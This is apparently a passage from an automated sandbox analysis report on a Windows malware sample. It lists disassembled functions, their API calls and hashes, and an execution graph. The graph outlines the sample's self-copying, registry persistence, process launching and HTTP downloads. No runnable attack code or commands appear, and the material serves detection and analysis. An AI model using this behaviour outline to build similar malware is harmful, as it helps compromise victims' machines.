                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                                                                                      Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                                                                                      • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2121970615-0
                                                                                                                                                                                                      • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                      • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                                                                                      Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2223660684-0
                                                                                                                                                                                                      • Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                                      • Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
                                                                                                                                                                                                      Function 0040E400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                                        • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                                        • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                                        • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
                                                                                                                                                                                                        • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
                                                                                                                                                                                                        • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                      • String ID: %S%S
                                                                                                                                                                                                      • API String ID: 1017111014-3267608656
                                                                                                                                                                                                      • Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                                      • Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1
                                                                                                                                                                                                      Function 0040DCD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 528846559-3424199868
                                                                                                                                                                                                      • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                      • Instruction ID: afdab107b7ea46b491ba3f785a3108c34962e981a5b403661ae60ceb940f9cda
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F11C974A04208EFDB14CF84C580B59B7B6FF49314F2081AAEC06AB381C775EE42DB95
                                                                                                                                                                                                      Function 00405EF0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 469056452-0
                                                                                                                                                                                                      • Opcode ID: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                                      • Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:0.1%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:1490
                                                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                                                      execution_graph 4456 407940 Sleep CreateMutexA GetLastError 4457 407976 ExitProcess 4456->4457 4458 40797e 6 API calls 4456->4458 4459 407d31 Sleep ShellExecuteW ShellExecuteW RegOpenKeyExW 4458->4459 4460 407a23 4458->4460 4462 407dcb RegOpenKeyExW 4459->4462 4463 407d9f RegSetValueExW RegCloseKey 4459->4463 4535 40f1b0 GetLocaleInfoA strcmp 4460->4535 4464 407e24 RegOpenKeyExW 4462->4464 4465 407df8 RegSetValueExW RegCloseKey 4462->4465 4463->4462 4467 407e51 RegSetValueExW RegCloseKey 4464->4467 4468 407e7d RegOpenKeyExW 4464->4468 4465->4464 4467->4468 4471 407ed6 RegOpenKeyExW 4468->4471 4472 407eaa RegSetValueExW RegCloseKey 4468->4472 4469 407a30 ExitProcess 4470 407a38 ExpandEnvironmentStringsW wsprintfW CopyFileW 4473 407b36 Sleep wsprintfW CopyFileW 4470->4473 4474 407a8c SetFileAttributesW RegOpenKeyExW 4470->4474 4475 407f03 RegSetValueExW RegCloseKey 4471->4475 4476 407f2f RegOpenKeyExW 4471->4476 4472->4471 4478 407c28 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4473->4478 4479 407b7e SetFileAttributesW RegOpenKeyExW 4473->4479 4474->4473 4477 407ac8 wcslen RegSetValueExW 4474->4477 4475->4476 4481 407f88 RegOpenKeyExW 4476->4481 4482 407f5c RegSetValueExW RegCloseKey 4476->4482 4483 407b29 RegCloseKey 4477->4483 4484 407afd RegCloseKey 4477->4484 4478->4459 4480 407c87 SetFileAttributesW RegOpenKeyExW 4478->4480 4479->4478 4485 407bba wcslen RegSetValueExW 4479->4485 4480->4459 4488 407cc3 wcslen RegSetValueExW 4480->4488 4490 407fb5 RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4481->4490 4491 40801f RegOpenKeyExW 4481->4491 4482->4481 4483->4473 4537 40f400 memset memset CreateProcessW 4484->4537 4486 407c1b RegCloseKey 4485->4486 4487 407bef RegCloseKey 4485->4487 4486->4478 4492 40f400 6 API calls 4487->4492 4493 407d24 RegCloseKey 4488->4493 4494 407cf8 RegCloseKey 4488->4494 4490->4491 4496 408050 RegSetValueExW RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4491->4496 4497 4080d9 RegOpenKeyExW 4491->4497 4498 407c08 4492->4498 4493->4459 4499 40f400 6 API calls 4494->4499 4496->4497 4501 4081f0 RegOpenKeyExW 4497->4501 4502 40810a 8 API calls 4497->4502 4498->4486 4505 407c13 ExitProcess 4498->4505 4506 407d11 4499->4506 4500 407b21 ExitProcess 4503 408221 8 API calls 4501->4503 4504 408307 Sleep 4501->4504 4502->4501 4503->4504 4542 40d180 4504->4542 4506->4493 4508 407d1c ExitProcess 4506->4508 4510 408322 9 API calls 4545 405c00 InitializeCriticalSection CreateFileW 4510->4545 5360 4077f0 4510->5360 5367 4058c0 4510->5367 5376 406f70 Sleep GetModuleFileNameW 4510->5376 4513 40848e 4517 4083d7 CreateEventA 4575 40c8b0 4517->4575 4526 40dbe0 16 API calls 4527 408438 4526->4527 4528 40dbe0 16 API calls 4527->4528 4529 408453 4528->4529 4530 40dbe0 16 API calls 4529->4530 4531 40846f 4530->4531 4618 40dd50 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4531->4618 4533 408480 4627 40de90 4533->4627 4536 407a28 4535->4536 4536->4469 4536->4470 4538 40f471 ShellExecuteW 4537->4538 4539 40f462 Sleep 4537->4539 4540 407b16 4538->4540 4541 40f497 Sleep 4538->4541 4539->4540 4540->4483 4540->4500 4541->4540 4635 40d150 4542->4635 4546 405d11 4545->4546 4547 405c38 CreateFileMappingW 4545->4547 4557 40e0c0 CoInitializeEx 4546->4557 4547->4546 4548 405c59 MapViewOfFile 4547->4548 4548->4546 4549 405c78 GetFileSize 4548->4549 4553 405c8d 4549->4553 4550 405d07 UnmapViewOfFile 4550->4546 4551 405c9c 4551->4550 4553->4550 4553->4551 4554 405ccc 4553->4554 4764 40d1d0 4553->4764 4771 405d30 4553->4771 4555 40ab60 __aligned_recalloc_base 3 API calls 4554->4555 4555->4551 5075 40e190 socket 4557->5075 4559 40e168 5119 40ac80 4559->5119 4562 4083d2 4570 407390 CoInitializeEx SysAllocString 4562->4570 4563 40e0e0 4563->4559 4563->4562 4564 40e12a 4563->4564 5085 40e400 4563->5085 5100 40b430 htons 4564->5100 4569 40eef0 24 API calls 4569->4559 4571 4073b2 4570->4571 4572 4073c8 CoUninitialize 4570->4572 5264 4073e0 4571->5264 4572->4517 5273 40c870 4575->5273 4578 40c870 3 API calls 4579 40c8ce 4578->4579 4580 40c870 3 API calls 4579->4580 4581 40c8de 4580->4581 4582 40c870 3 API calls 4581->4582 4583 4083ef 4582->4583 4584 40dbb0 4583->4584 4585 40a740 7 API calls 4584->4585 4586 40dbbb 4585->4586 4587 4083f9 4586->4587 4588 40dbc7 InitializeCriticalSection 4586->4588 4589 40bc70 InitializeCriticalSection 4587->4589 4588->4587 4596 40bc8a 4589->4596 4590 40bcb9 CreateFileW 4591 40bce0 CreateFileMappingW 4590->4591 4592 40bd8e 4590->4592 4591->4592 4594 40bd01 MapViewOfFile 4591->4594 5329 40b510 EnterCriticalSection 4592->5329 4594->4592 4597 40bd1c GetFileSize 4594->4597 4596->4590 5280 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4596->5280 5281 40b850 4596->5281 4604 40bd3b 4597->4604 4598 40bda7 4600 40dbe0 16 API calls 4598->4600 4601 408403 4600->4601 4606 40dbe0 4601->4606 4602 40bd84 UnmapViewOfFile 4602->4592 4604->4602 4605 40b850 31 API calls 4604->4605 5328 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4604->5328 4605->4604 4607 40dbf7 EnterCriticalSection 4606->4607 4608 40841c 4606->4608 5356 40dcd0 4607->5356 4608->4526 4611 40dcbb LeaveCriticalSection 4611->4608 4612 40a990 9 API calls 4613 40dc39 4612->4613 4613->4611 4614 40dc4b CreateThread 4613->4614 4614->4611 4615 40dc6e 4614->4615 4616 40dc92 GetCurrentProcess GetCurrentProcess DuplicateHandle 4615->4616 4617 40dcb4 4615->4617 4616->4617 4617->4611 4619 40dd86 InterlockedExchangeAdd 4618->4619 4620 40de69 GetCurrentThread SetThreadPriority 4618->4620 4619->4620 4626 40dda0 4619->4626 4620->4533 4621 40ddb9 EnterCriticalSection 4621->4626 4622 40de27 LeaveCriticalSection 4624 40de3e 4622->4624 4622->4626 4623 40de03 WaitForSingleObject 4623->4626 4624->4620 4625 40de5c Sleep 4625->4626 4626->4620 4626->4621 4626->4622 4626->4623 4626->4624 4626->4625 4628 40df12 4627->4628 4629 40de9c EnterCriticalSection 4627->4629 4628->4513 4630 40deb8 LeaveCriticalSection DeleteCriticalSection 4629->4630 4632 40ab60 __aligned_recalloc_base 3 API calls 4630->4632 4633 40df06 4632->4633 4634 40ab60 __aligned_recalloc_base 3 API calls 4633->4634 4634->4628 4638 40cda0 4635->4638 4639 40cdd3 4638->4639 4640 40cdbe 4638->4640 4642 408317 4639->4642 4670 40cf80 4639->4670 4644 40ce00 4640->4644 4642->4510 4642->4513 4645 40ceb2 4644->4645 4646 40ce29 4644->4646 4648 40a740 7 API calls 4645->4648 4669 40ceaa 4645->4669 4646->4669 4704 40a740 4646->4704 4650 40ced8 4648->4650 4652 402420 7 API calls 4650->4652 4650->4669 4654 40cf05 4652->4654 4656 4024e0 10 API calls 4654->4656 4658 40cf1f 4656->4658 4657 40ce7f 4659 402420 7 API calls 4657->4659 4660 402420 7 API calls 4658->4660 4661 40ce90 4659->4661 4662 40cf30 4660->4662 4663 4024e0 10 API calls 4661->4663 4664 4024e0 10 API calls 4662->4664 4663->4669 4665 40cf4a 4664->4665 4666 402420 7 API calls 4665->4666 4667 40cf5b 4666->4667 4668 4024e0 10 API calls 4667->4668 4668->4669 4669->4642 4671 40cfa9 4670->4671 4672 40d05a 4670->4672 4673 40d052 4671->4673 4674 40a740 7 API calls 4671->4674 4672->4673 4676 40a740 7 API calls 4672->4676 4673->4642 4675 40cfbf 4674->4675 4675->4673 4678 402420 7 API calls 4675->4678 4677 40d07e 4676->4677 4677->4673 4680 402420 7 API calls 4677->4680 4679 40cfe3 4678->4679 4681 40a740 7 API calls 4679->4681 4682 40d0a2 4680->4682 4683 40cff2 4681->4683 4684 40a740 7 API calls 4682->4684 4686 4024e0 10 API calls 4683->4686 4685 40d0b1 4684->4685 4687 4024e0 10 API calls 4685->4687 4688 40d01b 4686->4688 4690 40d0da 4687->4690 4689 40ab60 __aligned_recalloc_base 3 API calls 4688->4689 4691 40d027 4689->4691 4692 40ab60 __aligned_recalloc_base 3 API calls 4690->4692 4693 402420 7 API calls 4691->4693 4694 40d0e6 4692->4694 4695 40d038 4693->4695 4696 402420 7 API calls 4694->4696 4697 4024e0 10 API calls 4695->4697 4698 40d0f7 4696->4698 4697->4673 4699 4024e0 10 API calls 4698->4699 4700 40d111 4699->4700 4701 402420 7 API calls 4700->4701 4702 40d122 4701->4702 4703 4024e0 10 API calls 4702->4703 4703->4673 4715 40a760 4704->4715 4707 402420 4736 40a950 4707->4736 4712 4024e0 4743 402540 4712->4743 4714 4024ff _invalid_parameter 4714->4657 4724 40a800 GetCurrentProcessId 4715->4724 4717 40a76b 4718 40a777 __aligned_recalloc_base 4717->4718 4725 40a820 4717->4725 4720 40a74e 4718->4720 4721 40a792 HeapAlloc 4718->4721 4720->4669 4720->4707 4721->4720 4722 40a7b9 __aligned_recalloc_base 4721->4722 4722->4720 4723 40a7d4 memset 4722->4723 4723->4720 4724->4717 4733 40a800 GetCurrentProcessId 4725->4733 4727 40a829 4728 40a846 HeapCreate 4727->4728 4734 40a890 GetProcessHeaps 4727->4734 4730 40a860 HeapSetInformation GetCurrentProcessId 4728->4730 4731 40a887 4728->4731 4730->4731 4731->4718 4733->4727 4735 40a83c 4734->4735 4735->4728 4735->4731 4737 40a760 __aligned_recalloc_base 7 API calls 4736->4737 4738 40242b 4737->4738 4739 402820 4738->4739 4740 40282a 4739->4740 4741 40a950 __aligned_recalloc_base 7 API calls 4740->4741 4742 402438 4741->4742 4742->4712 4744 402551 4743->4744 4745 40258e 4743->4745 4744->4714 4745->4744 4746 40a950 __aligned_recalloc_base 7 API calls 4745->4746 4749 4025b2 _invalid_parameter 4746->4749 4747 4025e2 memcpy 4748 402606 _invalid_parameter 4747->4748 4751 40ab60 __aligned_recalloc_base 3 API calls 4748->4751 4749->4747 4753 40ab60 4749->4753 4751->4744 4760 40a800 GetCurrentProcessId 4753->4760 4755 40ab6b 4756 4025df 4755->4756 4761 40aaa0 4755->4761 4756->4747 4759 40ab87 HeapFree 4759->4756 4760->4755 4762 40aad0 HeapValidate 4761->4762 4763 40aaf0 4761->4763 4762->4763 4763->4756 4763->4759 4781 40abd0 4764->4781 4766 40d211 4766->4553 4770 40ab60 __aligned_recalloc_base 3 API calls 4770->4766 4994 40a990 4771->4994 4774 405d6a memcpy 4776 40abd0 8 API calls 4774->4776 4775 405e28 4775->4553 4777 405da1 4776->4777 5004 40cb40 4777->5004 4782 40abfd 4781->4782 4783 40a950 __aligned_recalloc_base 7 API calls 4782->4783 4784 40ac12 4782->4784 4785 40ac14 memcpy 4782->4785 4783->4782 4784->4766 4786 40c6e0 4784->4786 4785->4782 4789 40c6ea 4786->4789 4790 40c721 memcmp 4789->4790 4791 40c748 4789->4791 4792 40ab60 __aligned_recalloc_base 3 API calls 4789->4792 4794 40c709 4789->4794 4795 40cbd0 4789->4795 4809 4084a0 4789->4809 4790->4789 4793 40ab60 __aligned_recalloc_base 3 API calls 4791->4793 4792->4789 4793->4794 4794->4766 4794->4770 4796 40cbdf __aligned_recalloc_base 4795->4796 4797 40a950 __aligned_recalloc_base 7 API calls 4796->4797 4808 40cbe9 4796->4808 4798 40cc78 4797->4798 4799 402420 7 API calls 4798->4799 4798->4808 4800 40cc8d 4799->4800 4801 402420 7 API calls 4800->4801 4802 40cc95 4801->4802 4804 40cced __aligned_recalloc_base 4802->4804 4812 40cd40 4802->4812 4817 402470 4804->4817 4807 402470 3 API calls 4807->4808 4808->4789 4925 40a6c0 4809->4925 4813 4024e0 10 API calls 4812->4813 4814 40cd54 4813->4814 4823 4026f0 4814->4823 4816 40cd6c 4816->4802 4819 402484 _invalid_parameter 4817->4819 4820 4024ce 4817->4820 4818 40ab60 __aligned_recalloc_base 3 API calls 4818->4820 4821 40ab60 __aligned_recalloc_base 3 API calls 4819->4821 4822 4024ac 4819->4822 4820->4807 4821->4822 4822->4818 4826 402710 4823->4826 4825 40270a 4825->4816 4827 402724 4826->4827 4828 402540 __aligned_recalloc_base 10 API calls 4827->4828 4829 40276d 4828->4829 4830 402540 __aligned_recalloc_base 10 API calls 4829->4830 4831 40277d 4830->4831 4832 402540 __aligned_recalloc_base 10 API calls 4831->4832 4833 40278d 4832->4833 4834 402540 __aligned_recalloc_base 10 API calls 4833->4834 4835 40279d 4834->4835 4836 4027a6 4835->4836 4837 4027cf 4835->4837 4841 403e20 4836->4841 4858 403df0 4837->4858 4840 4027c7 _invalid_parameter 4840->4825 4842 402820 _invalid_parameter 7 API calls 4841->4842 4843 403e37 4842->4843 4844 402820 _invalid_parameter 7 API calls 4843->4844 4845 403e46 4844->4845 4846 402820 _invalid_parameter 7 API calls 4845->4846 4847 403e55 4846->4847 4848 402820 _invalid_parameter 7 API calls 4847->4848 4849 403e64 _invalid_parameter 4848->4849 4852 40400f _invalid_parameter 4849->4852 4861 402850 4849->4861 4851 402850 _invalid_parameter 3 API calls 4851->4852 4852->4851 4853 404035 _invalid_parameter 4852->4853 4854 402850 _invalid_parameter 3 API calls 4853->4854 4855 40405b _invalid_parameter 4853->4855 4854->4853 4856 402850 _invalid_parameter 3 API calls 4855->4856 4857 404081 4855->4857 4856->4855 4857->4840 4865 404090 4858->4865 4860 403e0c 4860->4840 4862 402866 4861->4862 4863 40285b 4861->4863 4862->4849 4864 40ab60 __aligned_recalloc_base 3 API calls 4863->4864 4864->4862 4866 4040a6 _invalid_parameter 4865->4866 4867 4040dd 4866->4867 4869 4040b8 _invalid_parameter 4866->4869 4870 404103 4866->4870 4895 403ca0 4867->4895 4869->4860 4871 40413d 4870->4871 4872 40415e 4870->4872 4905 404680 4871->4905 4873 402820 _invalid_parameter 7 API calls 4872->4873 4875 40416f 4873->4875 4876 402820 _invalid_parameter 7 API calls 4875->4876 4877 40417e 4876->4877 4878 402820 _invalid_parameter 7 API calls 4877->4878 4879 40418d 4878->4879 4880 402820 _invalid_parameter 7 API calls 4879->4880 4881 40419c 4880->4881 4918 403d70 4881->4918 4883 402820 _invalid_parameter 7 API calls 4884 4041ca _invalid_parameter 4883->4884 4884->4883 4887 404284 _invalid_parameter 4884->4887 4885 402850 _invalid_parameter 3 API calls 4885->4887 4886 4045a3 _invalid_parameter 4888 402850 _invalid_parameter 3 API calls 4886->4888 4889 4045c9 _invalid_parameter 4886->4889 4887->4885 4887->4886 4888->4886 4890 402850 _invalid_parameter 3 API calls 4889->4890 4891 4045ef _invalid_parameter 4889->4891 4890->4889 4892 402850 _invalid_parameter 3 API calls 4891->4892 4893 404615 _invalid_parameter 4891->4893 4892->4891 4893->4869 4894 402850 _invalid_parameter 3 API calls 4893->4894 4894->4893 4896 403cae 4895->4896 4897 402820 _invalid_parameter 7 API calls 4896->4897 4898 403ccb 4897->4898 4899 402820 _invalid_parameter 7 API calls 4898->4899 4900 403cda _invalid_parameter 4899->4900 4901 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4900->4901 4902 403d3a _invalid_parameter 4900->4902 4901->4900 4903 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4902->4903 4904 403d60 4902->4904 4903->4902 4904->4869 4906 402820 _invalid_parameter 7 API calls 4905->4906 4907 404697 4906->4907 4908 402820 _invalid_parameter 7 API calls 4907->4908 4909 4046a6 4908->4909 4910 402820 _invalid_parameter 7 API calls 4909->4910 4917 4046b5 _invalid_parameter 4910->4917 4911 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4911->4917 4912 404841 _invalid_parameter 4913 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4912->4913 4914 404867 _invalid_parameter 4912->4914 4913->4912 4915 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4914->4915 4916 40488d 4914->4916 4915->4914 4916->4869 4917->4911 4917->4912 4919 402820 _invalid_parameter 7 API calls 4918->4919 4920 403d7f _invalid_parameter 4919->4920 4921 403ca0 _invalid_parameter 9 API calls 4920->4921 4922 403db8 _invalid_parameter 4921->4922 4923 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4922->4923 4924 403de3 4922->4924 4923->4922 4924->4884 4926 40a6d2 4925->4926 4929 40a620 4926->4929 4930 40a950 __aligned_recalloc_base 7 API calls 4929->4930 4937 40a630 4930->4937 4933 40ab60 __aligned_recalloc_base 3 API calls 4934 4084bf 4933->4934 4934->4789 4935 40a66c 4935->4933 4937->4934 4937->4935 4938 409b50 4937->4938 4945 40a140 4937->4945 4950 40a510 4937->4950 4939 409b63 4938->4939 4944 409b59 4938->4944 4940 409ba6 memset 4939->4940 4939->4944 4941 409bc7 4940->4941 4940->4944 4942 409bcd memcpy 4941->4942 4941->4944 4958 409920 4942->4958 4944->4937 4946 40a14d 4945->4946 4947 40a157 4945->4947 4946->4937 4947->4946 4948 40a24f memcpy 4947->4948 4963 409e70 4947->4963 4948->4947 4951 40a51c 4950->4951 4953 40a526 4950->4953 4951->4937 4952 409e70 64 API calls 4954 40a5a7 4952->4954 4953->4951 4953->4952 4954->4951 4955 409920 6 API calls 4954->4955 4956 40a5c6 4955->4956 